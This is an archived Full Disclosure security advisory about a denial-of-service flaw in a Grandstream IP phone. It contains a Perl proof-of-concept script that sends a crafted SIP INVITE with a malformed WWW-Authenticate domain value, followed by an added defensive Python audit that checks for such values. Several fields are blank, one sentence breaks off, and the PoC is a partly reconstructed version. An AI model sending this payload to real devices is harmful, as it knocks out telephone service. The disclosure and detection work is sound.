Full Disclosure mailing list archives

Grandstream Budge Tone-200 denial of service vulnerability
From: "Radu State" <state@loria.fr>
Date: Wed, 21 Mar 2007 12:06:57 +0100

MADYNES Security Advisory 


http://madynes.loria.fr



Title: Grandstream Budge Tone-200 denial of service vulnerability 


Release Date:




      High - Denial of Service


Advisory ID: KIPH3


Hardware: Grandstream Budge Tone-200 IP Phone



Affected Versions: Program--    Bootloader-- 

Other versions may also be affected.




Vulnerability Synopsis: After receiving a crafted INVITE, CANCEL or any other
message carrying a "WWW-Authenticate" header whose Digest "domain" parameter
is crafted, the device freezes, resulting in a denial of service.



Impact: A remote attacker can crash the device and deny every service the
software provides by sending a single crafted SIP INVITE message. This is
conceptually similar to the "ping of


Resolution: The vendor was contacted several times and the complete report
was sent, but no feedback whatsoever was received.


Vulnerability Description: The device reboots after a crafted INVITE message
has been sent to it.


Configuration of our device:


Software Version:   Program--    Bootloader-- 

IP-Address obtained by DHCP as 

The configuration is the default






After a crafted INVITE, CANCEL or any other message carrying a
"WWW-Authenticate" header with a crafted Digest "domain" parameter is sent to
it, the device freezes, resulting in a DoS.




To run the exploit, launch the file invite_grandstream.pl (assuming our
configuration) as follows, with <dst> being the address the phone obtained
by DHCP:

perl invite_grandstream.pl <dst> 5060 Fosforito


Proof of Concept Code:




#!/usr/bin/perl
# invite_grandstream.pl - the MADYNES PoC as published, reassembled from the
# line-wrapped archive copy: the anti-spam mangling of "@" is undone and the
# wrapped string literals are rejoined with "." (assumed to be mail wrapping).
use strict;
use warnings;
use IO::Socket::INET;

die "Usage: $0 <dst> <port> <username>\n" unless defined $ARGV[2];

# The archived listing is cut off after PeerPort; the remaining arguments are
# the plain completion for a SIP-over-UDP target (assumption).
my $socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                   PeerPort => $ARGV[1],
                                   Proto    => 'udp')
    or die "socket: $@\n";

# $TOTAG is used but never set in the published PoC; an empty value leaves the
# To header without a tag parameter.
my $TOTAG = "";

# Fuzzer-generated Digest "domain" value that triggers the freeze/reboot.
# "%" is not special in a Perl double-quoted string, so it needs no escaping.
my $AUTH = "WWW-Authenticate: Digest domain=\""
  . "/-+:\@=\$%D6\$;\$=;=\$=\$,\@\$ =;\@;;,&&+:::=\@/2\$&;6+;+=%A5==;\@:=;\$&%A3:u,\@=\@;&;\@+::+&;+,,&/&\@=,;=&:&,=&:;:;;K+&\@=%DA*\$;\@&+&:;/="
  . "=%37:%A6;,\@%ED,:=:\@,;%DA;&\$)\$+=;+:%FE\$:\@;&=,W;,g%EF;%FB:+\@O\$+"
  . "%AF+;+:,&=%CA%EA;\$,\@+/;\@,-;:;,P&\@;_\$:%C7&+&/!,%EE\$:,\@:;;\@&\@,+,"
  . "z\@\$;\@\@\$\$::\@/=,\$3%ED=\@+%AE/=&\@;;\$;&\$%FE:\@;\$+:\$%EB\$=&:;&K&"
  . ";:\@%EA,=%BA6%21;=&:\$\"\r\n";

# Note the WWW-Authenticate header is placed in a request, where RFC 3261 does
# not define it; the phone still parses it.
my $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\n"
  . "Via: SIP/2.0/UDP;branch=z9hG4bK056a27e7;rport\r\n"
  . "From: <sip:tucu\@192.168.1.2>;tag=as011d1185\r\n"
  . "To: <sip:$ARGV[2]\@$ARGV[0]>;$TOTAG\r\n"
  . $AUTH
  . "CSeq: 6106 INVITE\r\nMax-Forwards: 70\r\nContent-Length: 0\r\n\r\n";

# The published listing stops after building $msg; sending it is the step the
# advisory describes.
$socket->send($msg) or die "send: $!\n";
print "Sent ", length($msg), " bytes to $ARGV[0]:$ARGV[1]\n";
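The PoC above shows the attacking side. What follows is an added example, not part of the MADYNES advisory and not Grandstream code: a small Python audit that parses a SIP message, extracts the Digest parameters from WWW-Authenticate, and flags what a hardened stack should reject before it ever touches the value: the header turning up in a request at all (RFC 3261 defines WWW-Authenticate as a response header, the 401 challenge), domain elements that are neither an absoluteURI nor an abs-path under the RFC 3261 grammar, and domains that exceed a length or element cap. The caps, the 192.0.2.x addresses, the tags and nonces, and both sample messages are constructed for the example; the crafted INVITE mirrors the shape of the PoC's payload but is not byte-identical to it.

```python
"""Audit SIP messages for abusive WWW-Authenticate Digest ``domain`` values.
Added example; not the advisory's PoC and not vendor code.  Caps and sample
messages are constructed for illustration."""
import re
from typing import Dict, List, Tuple

# RFC 3261 s25.1:  domain = "domain" EQUAL LDQUOT URI *( 1*SP URI ) RDQUOT
#                  URI    = absoluteURI / abs-path
# absoluteURI (RFC 2396) starts with scheme ":"; abs-path starts with "/" and
# is built from pchar, ";" params, "/" separators and %HH escapes.
_PCHAR = r"(?:[A-Za-z0-9\-_.!~*'()/:@&=+$,;]|%[0-9A-Fa-f]{2})"
_ABS_PATH = re.compile(r"^/" + _PCHAR + r"*$")
_ABS_URI = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:[\x21-\x7e]+$")
MAX_DOMAIN_LEN = 256   # assumption: sane cap for an embedded SIP stack
MAX_DOMAIN_URIS = 8    # assumption: no real deployment lists more


def parse_sip_message(raw: bytes) -> Tuple[str, Dict[str, List[str]]]:
    """Return (start line, headers). Header names are lowercased and repeated
    headers keep every occurrence; the body is ignored."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def parse_digest_params(challenge: str) -> Dict[str, str]:
    """Split 'Digest k="v", k2=token' into a dict; quoted values keep quotes."""
    scheme, _sep, params = challenge.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest challenge: %r" % scheme)
    out: Dict[str, str] = {}
    # name = quoted-string (may contain commas and spaces) / token
    for m in re.finditer(r'([A-Za-z0-9._-]+)\s*=\s*("(?:[^"\\]|\\.)*"|[^,\s]+)', params):
        out[m.group(1).lower()] = m.group(2)
    return out


def check_domain(quoted: str) -> List[str]:
    """Validate a domain parameter against the grammar plus size caps."""
    issues: List[str] = []
    if len(quoted) < 2 or quoted[0] != '"' or quoted[-1] != '"':
        return ["domain is not a quoted string"]
    value = quoted[1:-1]
    if len(value) > MAX_DOMAIN_LEN:
        issues.append("domain too long (%d > %d)" % (len(value), MAX_DOMAIN_LEN))
    uris = value.split()
    if len(uris) > MAX_DOMAIN_URIS:
        issues.append("domain lists %d URIs (> %d)" % (len(uris), MAX_DOMAIN_URIS))
    for uri in uris:
        if not (_ABS_PATH.match(uri) or _ABS_URI.match(uri)):
            issues.append("domain element is neither absoluteURI nor abs-path: %r" % uri[:40])
    return issues


def audit(raw: bytes) -> List[str]:
    """Return a list of findings for one SIP message (empty means clean)."""
    start, headers = parse_sip_message(raw)
    issues: List[str] = []
    challenges = headers.get("www-authenticate", [])
    if challenges and not start.startswith("SIP/2.0 "):
        issues.append("WWW-Authenticate present in a %s request; RFC 3261 "
                      "defines it only for responses" % start.split(" ")[0])
    for challenge in challenges:
        try:
            params = parse_digest_params(challenge)
        except ValueError as exc:
            issues.append(str(exc))
            continue
        if "domain" in params:
            issues.extend(check_domain(params["domain"]))
    return issues


# Constructed sample: a well-formed 401 challenge from a phone.
BENIGN_401 = (
    b"SIP/2.0 401 Unauthorized\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK7761\r\n"
    b"From: <sip:alice@192.0.2.10>;tag=1928301774\r\n"
    b"To: <sip:bob@192.0.2.20>;tag=a6c85cf\r\n"
    b"Call-ID: a84b4c76e66710\r\nCSeq: 1 INVITE\r\n"
    b'WWW-Authenticate: Digest realm="192.0.2.20", domain="sip:192.0.2.20 /phone", '
    b'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", algorithm=MD5, qop="auth"\r\n'
    b"Content-Length: 0\r\n\r\n"
)

# Constructed to mirror the PoC: an INVITE (a request) carrying a
# WWW-Authenticate whose domain is fuzzer garbage instead of a URI list.
CRAFTED_INVITE = (
    b"INVITE sip:Fosforito@192.0.2.20 SIP/2.0\r\n"
    b"Via: SIP/2.0/UDP;branch=z9hG4bK056a27e7;rport\r\n"
    b"From: <sip:tucu@192.0.2.10>;tag=as011d1185\r\n"
    b"To: <sip:Fosforito@192.0.2.20>\r\n"
    b'WWW-Authenticate: Digest domain="/-+:@=$%D6$;$=;=$=$,@$ =;@;;,&&+:::=@/2$&;6+;+=%A5==;'
    b'@:=;$&%A3:u,@=@;&;@+::+&;+,,&/&@=,;=&:&,=&:;:;;K+&@=%DA*$;@&+&:;/="\r\n'
    b"CSeq: 6106 INVITE\r\nMax-Forwards: 70\r\nContent-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for label, msg in (("benign 401", BENIGN_401), ("crafted INVITE", CRAFTED_INVITE)):
        print(label, "->", audit(msg) or "clean")
```

Worth noting when reading the output: the first junk element of the crafted domain (`/-+:@=$%D6$;...`) passes the grammar check, because `/` followed by pchar characters and `%HH` escapes is a syntactically valid abs-path. Only the second element fails, and the request-context finding fires regardless of content. A grammar check alone is therefore not the defence; the context check and the length and element caps are what stop a fuzzer-shaped value from reaching a fixed-size buffer in the parser.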








      Humberto J. Abdelnur (Ph.D Student)

      Radu State (Ph.D)

      Olivier Festor (Ph.D)

      This vulnerability was identified by the Madynes research team at
      INRIA Lorraine, using the Madynes VoIP fuzzer.

      http://madynes.loria.fr/



Disclosure Distribution: 

      The advisory will be posted on the following websites:


       http://madynes.loria.fr website


      The advisory will be posted to the following mailing lists:


      1)    full-disclosure@lists.grok.org.uk

      2)    voipsec@vopisa.org



Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
